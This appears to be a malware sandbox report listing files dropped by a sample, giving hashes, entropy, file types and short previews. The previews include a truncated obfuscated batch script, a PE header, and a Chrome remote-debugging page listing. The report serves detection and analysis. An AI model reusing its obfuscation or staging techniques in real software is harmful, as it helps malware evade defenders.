                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.387286688797216
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCfk4TECfMfNaoCAC/YfNaoCpCvfNaoC3a6am0UrU0U8C31:6NnCfk4TECf4NnCAC/kNnCpCHNnCt0Uw
                                                                                                                                                                                                                                                                                                  MD5:D6B0A508DA616790AC174326A6659A07
                                                                                                                                                                                                                                                                                                  SHA1:326D31E091197D8F3B2C43B8B9CA272993F5D9ED
                                                                                                                                                                                                                                                                                                  SHA-256:54B0DDE1A89EF61F6783F439FACFF49C40CE3100A5032131FB5CFE12D7D36B26
                                                                                                                                                                                                                                                                                                  SHA-512:659EA93A0BE3CA0AFFD2AB8D554BBF00730DE3354A394C174E6E6C0F81D947376E2527D9C0FCBEBD9C69E9AB47492ABF338BFE8EF127A3CF4A41D3ACA75AC6EE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6DC204D306960A5AAA79981C8FDA712E",.. "id": "6DC204D306960A5AAA79981C8FDA712E",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6DC204D306960A5AAA79981C8FDA712E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/CAF92B14350718208A7CCF848D4C60B2",.. "id": "CAF92B14350718208A7CCF848D4C60B2",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/CAF92B14350718208A7CCF848D4C60B2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 9EI7wrGs4K.exe, Detection: malicious
• Filename: Wine.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: GoldenContinent.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):273750
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999303811507272
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:1KvEEvruhRDeI/GcvMoakx9K/vRg5ir1Tc/UE85jntD:2n0RyO70xkkK56ep85j1
                                                                                                                                                                                                                                                                                                  MD5:EE15AD7483051C844B95DD14CB16B4CA
                                                                                                                                                                                                                                                                                                  SHA1:3E0E0DB838B650D6F1302AA4CB6F3B7CC736EBDE
                                                                                                                                                                                                                                                                                                  SHA-256:AA221B76B3C00ADFB49BED18CDF4095A304A4FB468EAFD590F347552F37799BF
                                                                                                                                                                                                                                                                                                  SHA-512:A6BCA037DD588B0522DC5A2A9E04C91CB68FC9122715964BAF8E483FDDC683ACD921B7DC3F293C5BBF920D01F38CF9269E4EBE9F807F6982853E2EF16DF7B40E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70300
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.836652071119625
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:yExd3LurhMIBKe19FhAVmEz63lXv2os8VJvxmR5ukXz/M7tz:xrsd719umEO3lXvFs8Pi5uWz/M7tz
                                                                                                                                                                                                                                                                                                  MD5:2BD7BD2901DE70F520C41987E2730D3D
                                                                                                                                                                                                                                                                                                  SHA1:0B3A20AAF67ABB401F4DABD824DE249A1D7649C7
                                                                                                                                                                                                                                                                                                  SHA-256:47612542AD0E67791DB220A7843C41471062F66BBA30254D4AEC4F1F7D08E513
                                                                                                                                                                                                                                                                                                  SHA-512:B6394D310F3A82CD34DF987B10196156BF814EEAC8F7F3738D007A90CA31C38D182B366E89162618A249C5CDF376136A00ABD4F74FA0F87E81868A24B444318E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):95232
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998013871096484
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:sqxpOVTjMxZlPtl92iCycbXvruGQCeja6M0fSoXiZyeEP/TGN9bzZ5133He2qBxo:tPKv6lNX0vruGfwfSoSEeEP/yN5VTfc6
                                                                                                                                                                                                                                                                                                  MD5:6C1AEE29BD7F5710593402D1C6FC2142
                                                                                                                                                                                                                                                                                                  SHA1:1CC5943734CC2FC1D7BBC488E97F821239A3E3B9
                                                                                                                                                                                                                                                                                                  SHA-256:B869F6B200ABFF5542721F7CCDC87BB01CDBC31102956DCAA7E46C552D5B982E
                                                                                                                                                                                                                                                                                                  SHA-512:2561BEC7C1391347D7BDE38C344A98ECD64764733F6B39EC702A96AD9CD9B140795DFEBAB9B944DB7CCDF08B6DC63C58665F6263E7D546E8AE336F36EE43A46A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):54272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677771683499516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:JWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY46z:JWf05mjccBiqXvpgFz
                                                                                                                                                                                                                                                                                                  MD5:03A413E3C0F468A8DAFF75C079A6E00E
                                                                                                                                                                                                                                                                                                  SHA1:9FF241CE3B86AA1AAC24F308C92C723B267A3A7F
                                                                                                                                                                                                                                                                                                  SHA-256:28EF2EF007A8F2FA7648EDD51C6FBBEEB98725F5D6450900A4735AD228A3903F
                                                                                                                                                                                                                                                                                                  SHA-512:0486E660AFE95510B4398A7D099EB20BAC1487925E8042ACB7495FFDB760B635C49F8AF781F3E0DD2531198AF35260D14B00F109A41CE21AA92F5B186F12C47D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):104448
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.730957014085472
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:CSfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPZ:CTq8QLeAg0Fuz08XvBNbjaAtsPZ
                                                                                                                                                                                                                                                                                                  MD5:130CD154679F29A6F3CAD6E427478683
                                                                                                                                                                                                                                                                                                  SHA1:6F5696ED43C2220B49405C4FD58ABEC781E14508
                                                                                                                                                                                                                                                                                                  SHA-256:9384137A3D8CC870B9D283225A60759FECE3D27CF3162E36F506480BCE06E51D
                                                                                                                                                                                                                                                                                                  SHA-512:BA3780D03DE2EAB88D16D319167F7A9A74EB1BFA1BA4E9181E582C0B9C715A8C5E3183F709E79326839A9D5650CA72D849B0F0ED1F213C504F75D350513E5F7A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99759569761765
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:OkX5PKc1atTQk4hffe99dtn9QlLTB1rIFcAsR371d9pBOQHifictIsB/Aa+t:OkJKBtTQk4Jfe99dtn9KLTLr/R371Okz
                                                                                                                                                                                                                                                                                                  MD5:FF2CE214D200D352C7D04800B152BC2E
                                                                                                                                                                                                                                                                                                  SHA1:988EF81E6A0F7571B52686341931162430BA6261
                                                                                                                                                                                                                                                                                                  SHA-256:311655E9C9BF8035F60D9E762C3C95D264232BFD96855E793402A5B5F4D5A13A
                                                                                                                                                                                                                                                                                                  SHA-512:9CB2A6AB541EB7BC96B7E4B15DA21456EEEDA8D9C8AB01BD84C794D46C632F0D2AACA480516F8D0A527AFB253AE196E7B5B54338BBF07F5145B912A4A6C3DFCD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):125952
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.720932430021314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pZ:/HS3zcNPj0nEo3tb2j6AZ
                                                                                                                                                                                                                                                                                                  MD5:208ACEF2DFC4E230B25B4B4A0673FFE1
                                                                                                                                                                                                                                                                                                  SHA1:8D09B32A1BE8EBE1F8695653AA50C1FED4AB20C5
                                                                                                                                                                                                                                                                                                  SHA-256:152D7CCB9A28B79D9C29077330ED61C34BAD168C4B0BACBE16907D90A2046A65
                                                                                                                                                                                                                                                                                                  SHA-512:0DC461B583727B831BBD51A5B1822FE160CAAE07A46313F17D2957056D623C8CA103B3A47278C42F0EDE5C148D3717E065F6BB3CCFEB5E151272DAB91E0FBAE1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (388), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.136304923041809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:qFuJ9+qaE/5fOUYbE4g8jJ5U26CJvO6fhsI:qFO9N1vSE4J17JvO6iI
                                                                                                                                                                                                                                                                                                  MD5:1B6ACA105B86401BF6A8206AB2ED2604
                                                                                                                                                                                                                                                                                                  SHA1:4EC6822B90EEAC4ED23B1B199B6C1AC235601ADA
                                                                                                                                                                                                                                                                                                  SHA-256:1C68DA14F6314DB369B3A2A9E1BC2023F2E16F34B21D1F4C239511495473B183
                                                                                                                                                                                                                                                                                                  SHA-512:A163AD3005A74ADA8480F4CE6AEEE1692A487FFC4266530AB2F14F7F5B3B1CDAD0E26F2FEE895B0F16C0A9B42C08F2608AF3D8AD41E84A914B9E7AAB48177B07
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Rose=H..wAlxFaces-Joke-Experiencing-Supply-S-..qOwSample-Lopez-..DcVpn-Fx-Hunt-Reg-..enBrands-Younger-Benefits-Statistical-..dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-..RoPressure-..Set Instrumentation=w..RrQCNick-Vampire-Longer-..ynaOpponents-..rfxEden-Feat-..gmAu-Dishes-Slots-..lNCarriers-Safety-Stations-Utc-Parish-Kids-Babes-..JtPassed-Bolivia-Borough-Furniture-Been-..upIGlucose-Faster-Once-Seasonal-Failures-..lsGathered-Designed-..PkkPl-Host-Shemale-Expense-Yards-Nervous-Dimensional-..Set Walker=y..zUuBMusical-Cest-..CeVkAngry-Unless-Greatly-Dont-Hepatitis-..ovFKnee-Mode-Austria-Messenger-Discover-Expanded-Took-Contracting-Oil-..xtChinese-Coalition-Builder-Resources-Shoppers-Seeks-Heavy-Optical-..NyPhilips-Tools-Beds-Applied-..QBAbuse-Panama-Violations-Appreciation-Alexander-Techrepublic-Phones-..SfiVolleyball-..jyRap-Flights-Pakistan-..gkWarcraft-Child-Nickname-Heating-Slot-Chief-Llc-Dj-..dOAkRealize-..Set Unexpected=C..zmVfFantasy-..HNLPrivate-..LpIFBed-Novels-El
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (388), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.136304923041809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:qFuJ9+qaE/5fOUYbE4g8jJ5U26CJvO6fhsI:qFO9N1vSE4J17JvO6iI
                                                                                                                                                                                                                                                                                                  MD5:1B6ACA105B86401BF6A8206AB2ED2604
                                                                                                                                                                                                                                                                                                  SHA1:4EC6822B90EEAC4ED23B1B199B6C1AC235601ADA
                                                                                                                                                                                                                                                                                                  SHA-256:1C68DA14F6314DB369B3A2A9E1BC2023F2E16F34B21D1F4C239511495473B183
                                                                                                                                                                                                                                                                                                  SHA-512:A163AD3005A74ADA8480F4CE6AEEE1692A487FFC4266530AB2F14F7F5B3B1CDAD0E26F2FEE895B0F16C0A9B42C08F2608AF3D8AD41E84A914B9E7AAB48177B07
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Rose=H..wAlxFaces-Joke-Experiencing-Supply-S-..qOwSample-Lopez-..DcVpn-Fx-Hunt-Reg-..enBrands-Younger-Benefits-Statistical-..dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-..RoPressure-..Set Instrumentation=w..RrQCNick-Vampire-Longer-..ynaOpponents-..rfxEden-Feat-..gmAu-Dishes-Slots-..lNCarriers-Safety-Stations-Utc-Parish-Kids-Babes-..JtPassed-Bolivia-Borough-Furniture-Been-..upIGlucose-Faster-Once-Seasonal-Failures-..lsGathered-Designed-..PkkPl-Host-Shemale-Expense-Yards-Nervous-Dimensional-..Set Walker=y..zUuBMusical-Cest-..CeVkAngry-Unless-Greatly-Dont-Hepatitis-..ovFKnee-Mode-Austria-Messenger-Discover-Expanded-Took-Contracting-Oil-..xtChinese-Coalition-Builder-Resources-Shoppers-Seeks-Heavy-Optical-..NyPhilips-Tools-Beds-Applied-..QBAbuse-Panama-Violations-Appreciation-Alexander-Techrepublic-Phones-..SfiVolleyball-..jyRap-Flights-Pakistan-..gkWarcraft-Child-Nickname-Heating-Slot-Chief-Llc-Dj-..dOAkRealize-..Set Unexpected=C..zmVfFantasy-..HNLPrivate-..LpIFBed-Novels-El
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72470
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.090938284600055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:iWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:iWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                  MD5:BA176DB7E9DE7450C412A1C571937169
                                                                                                                                                                                                                                                                                                  SHA1:01718D40F54E5340E876E0C8CD15BC4B9C3CFF11
                                                                                                                                                                                                                                                                                                  SHA-256:1929AF35C1CCA40411BBF3C6BC4FF1416FA4971D2EAB01E4B3CA9D82BC78FD50
                                                                                                                                                                                                                                                                                                  SHA-512:D572131B71C8F652ABFC0F2DC9ADEC3045F21C3D14466579A9B9C9EEACBD1B492BF64225F34BE336799519FDA43650D004D3ABEC29F861E460472FB0815FFD3B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):109568
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.612046274568224
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kpIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jW:vphfhnvO5bLezWWt/Dd314V14ZgP0f
                                                                                                                                                                                                                                                                                                  MD5:EBAFAFE47265312CC96968BB58945199
                                                                                                                                                                                                                                                                                                  SHA1:4628BB988C420CCEAC163E069A082987A2A508E4
                                                                                                                                                                                                                                                                                                  SHA-256:9C0CE1E70AF52572D22685F85E9F2D75EB9D4C1CE8E82EA71C4A644B9E0927BA
                                                                                                                                                                                                                                                                                                  SHA-512:48827473E4259133AE2E759287770592B08B30349CB855FE67620E170EFDD9566FFAE1FB96EC6C2B1BB1C7FA9257566661C7E208A81CCE4DAF9B78E3D44F96A6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):56320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.484381852148502
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mkBvRmLORuCYm9PrpmESvn+pqFqaynB6G/:mkBJR8CThpmESv+AqVnBV
                                                                                                                                                                                                                                                                                                  MD5:04915E6EFC00606817E44B785E0FC040
                                                                                                                                                                                                                                                                                                  SHA1:972C805FD5532BD87F0F754F39026FE975F82596
                                                                                                                                                                                                                                                                                                  SHA-256:176CDBDB7708CE1F761AF3EB1F33B66627B52D6C48BE213C6596DBCE68731F3A
                                                                                                                                                                                                                                                                                                  SHA-512:411DF77612FE79C83BFC826F7A922DDE6CADC316A8084E4E63FCD4C191F165526F8F1F7BA973849CD8637A7224DAFCF81C613519B5CE24B0D44695C3A3B300D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):99328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.610810182218458
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:qi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSW:F0Imbi80PtCZEMnVIPPBxT/sZydTmp
                                                                                                                                                                                                                                                                                                  MD5:F87E02324242F1CA95FEDBA37CAA7F29
                                                                                                                                                                                                                                                                                                  SHA1:0490816C97722E9D4DA97985E67A7BE8E2E4EB7A
                                                                                                                                                                                                                                                                                                  SHA-256:6D089A79D61945744FDD931C131068B2E2ACCA8721DF0D26D9D797957D88B0E0
                                                                                                                                                                                                                                                                                                  SHA-512:DFF322F1D33AEFEFAF00E1EB26D90B90A031820B97E5C6D90FE90259542AC2B75FF6A3E09F585B855DD2AE012760E3963AEF35294B254E2560225CDB6617E06C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70656
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.697542216564925
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:UqvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CY:Uqv+32eOyKODOSpQSAU4CY
                                                                                                                                                                                                                                                                                                  MD5:D1DA746C6F362A9F5F7F1C85881D10DB
                                                                                                                                                                                                                                                                                                  SHA1:BBC4E7309BB49662A7A6DB1F783821B98C68C259
                                                                                                                                                                                                                                                                                                  SHA-256:0DDD6AB68693CDEA2F6B39FBB12328E3D41CC39DC4B9F40B7810149872CAEF20
                                                                                                                                                                                                                                                                                                  SHA-512:0331C3E4F496E125EF6B0A2A84547DC172302FF75E137E83DC10CE9161AFE3A64883BC6665560CC40620D07F18CE163B2BCFC68B3E3176AF99F1804ACF88F2DA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:Targa image data 19 x 8 x 8 +19 +19 "\023"
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.744731530331674
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:D/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDh:HKaj6iTcPAsAhxjgarB/5el3EYr+
                                                                                                                                                                                                                                                                                                  MD5:9C30E32FFCE2AA493EF4238A2BA1FDAF
                                                                                                                                                                                                                                                                                                  SHA1:282D80B3D0481BD1FACAD68EE6AE344E4001122B
                                                                                                                                                                                                                                                                                                  SHA-256:55E244354B1483FC405522D97EDE1C752C6B8F288A17D4FF32CB410C6ED48404
                                                                                                                                                                                                                                                                                                  SHA-512:8B17C56AAB1EB5AC2AAFAC6F7C92CB9AFC76DAF409574C34CCB7C0D027E6705CD62510DB35DFE1AAB60DA96130D4B94DE9450BA92911323042CDE548B596E2B9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35158
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.994885764726237
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:768:3vxVBcQYfpcf0WQqF0S8n/raX8IyIF5YeN+mDsBo+7Y6PybMq74IIjO42:3Z3pYhcf0WIDWMINl+AbMQ8OP
                                                                                                                                                                                                                                                                                                  MD5:94A5A552EFE142146E3A98ADEBC6002F
                                                                                                                                                                                                                                                                                                  SHA1:018FD52A873DEAF40D37CE5894C30492F90FAD9D
                                                                                                                                                                                                                                                                                                  SHA-256:2028CD9387AC54BBD6929857FC52D994531D7E2D05AB7D1AB5DD35B06EE44D52
                                                                                                                                                                                                                                                                                                  SHA-512:52076D5003172B51E35C9D2FE85D65D3B18E377F6DCD0EB47DD4A91CD44CEB1BC187CECA84DCE32FB39676A247DA3C280E57B6F3E1E40FE21DAFA37C3CCB605D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2375
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.277576828055318
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:a9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJci:aSEA5O5W+MfH5S1CqlVJci
                                                                                                                                                                                                                                                                                                  MD5:3072F9007A0EC1D4F38505C4053581F4
                                                                                                                                                                                                                                                                                                  SHA1:C6B7FAFC0FFF4E0BD8E11281FA2871EDFFB6E60B
                                                                                                                                                                                                                                                                                                  SHA-256:0A48E97F5221173353BC56E28BA0BFE5D9037DC71DD0DF6B0647E6B8C7D104BC
                                                                                                                                                                                                                                                                                                  SHA-512:4C9260FA5027F13DF6E563FFC8D8A639C0AE05A41A3E72968C802CFA9F4F00ED6C314764851B83309944DCA2CE8917E678F9CD6E122EB239248FA89DA2C2FDDD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Frame........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):61440
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997183352215181
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XyJPsjjtU2jOw1cOmYgmObUGW/HcXG308:X7/tULKc/UEe
                                                                                                                                                                                                                                                                                                  MD5:9D729FA7DCC31DD7E20873436D29FDE4
